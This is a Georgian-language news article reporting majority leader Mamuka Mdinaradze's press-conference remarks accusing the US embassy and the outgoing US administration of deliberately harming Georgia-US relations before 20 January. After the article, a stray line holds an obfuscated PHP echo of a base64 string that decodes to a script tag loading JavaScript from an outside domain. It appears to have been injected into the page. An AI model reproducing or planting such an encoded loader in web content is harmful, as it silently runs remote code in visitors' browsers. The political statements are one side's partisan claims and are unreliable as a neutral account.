celsiusi
ავერსი საქკაბელი

 ამერიკის შეერთებული შტატების საელჩო ყოველ დღე რაღაც საშაირო "ქარდებს" დებს. ჩვენ რა უნდა ვუპასუხოთ - „მე შაირი არ მინდოდაო“ თუ რა გავაკეთოთ? - მიზანია, რომ ამერიკის შეერთებულ შტატებთან საქართველოს ურთიერთობა ისე გაფუჭდეს, რომ ტრამპის ადმინისტრაციასაც გაუჭირდეს ამის დალაგება,- ამის შესახებ საპარლამენტო უმრავლესობის ლიდერმა მამუკა მდინარაძემ პრესკონფერენციაზე განაცხადა.

მისი თქმით, ეს ყველაფერი „წარმოუდგენელი მარაზმია“, რომლის რიგებშია ასევე ვოლოდიმირ ზელენსკის მიერ დაწესებული სანქციები, რომელსაც მდინარაძე „ქართული აგენტურული ოპოზიციისთვის საჩუქარს“ უწოდებს.
„ამერიკის შეერთებული შტატების ელჩის მიმართ პოზიტიური დამოკიდებულება გვაქვს, როგორც პიროვნების მიმართ, მაგრამ ამ ადამიანს, სამწუხაროდ, რაღაც "ქარდების" დადება უწევს. შაირობა გამოდის უკვე. აშშ-ის საელჩო ყოველ დღე რაღაც საშაირო "ქარდებს" დებს. ჩვენ რა უნდა ვუპასუხოთ - „მე შაირი არ მინდოდაო“ თუ რა გავაკეთოთ? აქედან როგორ მოვიქცეთ? საოცრება ხდება, წარმოუდგენელი მარაზმი ხდება. სამწუხაროდ, ამ რიგშია ქართული ჯაშუშური ქსელის მიმართ გამეტებული საჩუქარი რომელიც ზელენსკის ხელით გაუკეთეს მათმა პატრონებმა ქართულ აგენტურულ ოპოზიციას, თუმცა ეს კი არა, უფრო მეტი არ უშველის მათ“,- განაცხადა მამუკა მდინარაძემ.
მისივე თქმით, ტრამპის ადმინისტრაციასა და „ქართულ ოცნებას“ შორის პრინციპულ საკითხებზე ორმხრივი თანხმობაა და მოქმედი ადმინისტრაცია ცდილობს, ისე გააფუჭოს ურთიერთობები, რომ მისი დალაგება, როგორც მინიმუმ, დროში გაიწელოს.
„ამ ყველაფრის მიზანია, რომ ამერიკის შეერთებულ შტატებთან საქართველოს ურთიერთობა ისე გაფუჭდეს, რომ ტრამპის ადმინისტრაციასაც გაუჭირდეს ამის დალაგება. ეს არის კუდის მოქნევის მიზეზი, რაც აქამდე არ და ვერ გააკეთეს, ახლა, 20 იანვრამდე ცდილობენ ამის გაკეთებას. ტრამპის ადმინისტრაციას პრინციპულად ვეთანხმებით მთავარ საკითხებში და ისინიც გვეთანხმებიან, რომ ოჯახის საკითხი უალტერნატივოა, ქალი და მამაკაცი არის ქალი და მამაკაცი და არა სხვა გენდერები; ასევე ის, რომ გამჭვირვალობა დემოკრატიული საწყისია - ამაშიც ვეთანხმებით ერთმანეთს. ამ ორმხრივი თანხმობის ფონზე, მოქმედი ადმინისტრაცია ცდილობს, ისე გააფუჭოს ურთიერთობები ამ ორ ქვეყანას შორის, რომ მისი დალაგება, როგორც მინიმუმ, დროში გაიწელოს“,- განაცხადა მამუკა მდინარაძემ.
52
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");